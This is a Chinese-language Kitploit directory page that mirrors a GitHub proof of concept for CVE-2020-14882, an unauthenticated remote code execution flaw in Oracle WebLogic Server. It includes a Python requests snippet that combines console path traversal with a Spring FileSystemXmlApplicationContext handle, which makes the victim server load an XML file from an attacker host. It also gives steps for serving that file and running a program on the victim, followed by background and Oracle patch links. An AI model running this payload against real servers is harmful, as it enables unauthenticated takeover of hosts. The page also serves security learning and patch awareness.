Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-14882 — 接管 Oracle WebLogic Server | Kitploit
工具/GitHubGitHub/lucaspdiniz/cve-2020-14882
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHublucaspdiniz/cve-2020-14882

CVE-2020-14882

接管 Oracle WebLogic Server

查看仓库
112年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WebLogic RCE 漏洞 - CVE-2020-14882

  • 简介

CVE-2020-14882 是 Oracle WebLogic Server 控制台组件中的一个远程代码执行 (RCE) 漏洞。该未授权漏洞的攻击复杂度被评定为“低”,并被 Oracle 标为“易于利用”,从而获得了 9.8 分的严重 CVSSv3 评分。成功利用后,未经身份验证的攻击者能够通过 HTTP 入侵 Oracle WebLogic 服务器,并完全控制主机。(了解更多 - Tenable)

  • 评分严重性 - CVSS 3 ⚠️


受影响的支持版本为 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0。

探索 - POC ❗

环境 💻

受害者(WebLogic 服务器):192.168.0.15 - 运行 WebLogic 服务器的 Windows 10 PRO。
攻击者(托管 XML 文件):192.168.0.16 - Kali Linux - GNU/Linux - Debian。

  1. 第一步,我们创建一个 Python 文件,用于利用 weblogic 漏洞。

Payload:

root@kitploit:~
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
		'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
		'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)

该 payload 会调用 Spring 框架的 XML 库,向攻击者域中的服务器发送请求,寻找 teste.xml 文件。

  1. 我们需要准备由受害者调用的 XML 文件。我们创建了一个标准的 XML 结构,但包含了框架,其中 value 字段非常重要,因为它们将在受害者端被执行。在本例中,我们调用了 Windows 计算器程序。

  1. 在攻击者的主机上,我们需要创建一个服务器,提供受害者请求的 XML 文件。为方便起见,我们使用自己的 Python 服务器 http.server。

  1. 开始攻击 🎯。我们运行 步骤 1 的脚本。在此步骤中,我们可以识别出受害者发起的 XML 文件调用日志。

  1. RCE 成功执行 💥。在受害者端,可以看到远程执行(RCE)的 Windows 计算器。

结论

10 月 28 日,一位名为 Jang 的安全研究员发布了一篇博客文章(越南语),内容涉及 CVE-2020-14882,其中包括可用于 PoC 的部分细节。Jang 对 WebLogic 漏洞并不陌生,曾于 2020 年 1 月发现并向 Oracle 报告了 CVE-2020-2555,该漏洞已在 Oracle 的 CPU 更新中修复。3 月,Jang 确认 CVE-2020-2555 并未完全修复。对于 CVE-2020-2555 的绕过方法由另一位研究员 Quynh Le(VNPT 信息安全中心)披露。Le 和 Jang 均因报告此绕过方法而获得致谢,该绕过方法被标识为 CVE-2020-2883。(了解更多 - Tenable)

一些修复相关的链接

  • Oracle WebLogic: CVE-2020-14882 : Critical Patch Update(文档 ID 2771503.1)。(Oracle 支持)

  • Oracle Critical Patch Update Advisory - 2020 年 10 月。(Oracle 支持)

  • 如何缓解 CVE-2020-14882 Weblogic 的影响。(Oracle 支持)

  • Oracle Fusion Middleware 的 Oracle WebLogic Server 产品中的漏洞。(Mitre - CVE)

漏洞已修复 ✅

下载工具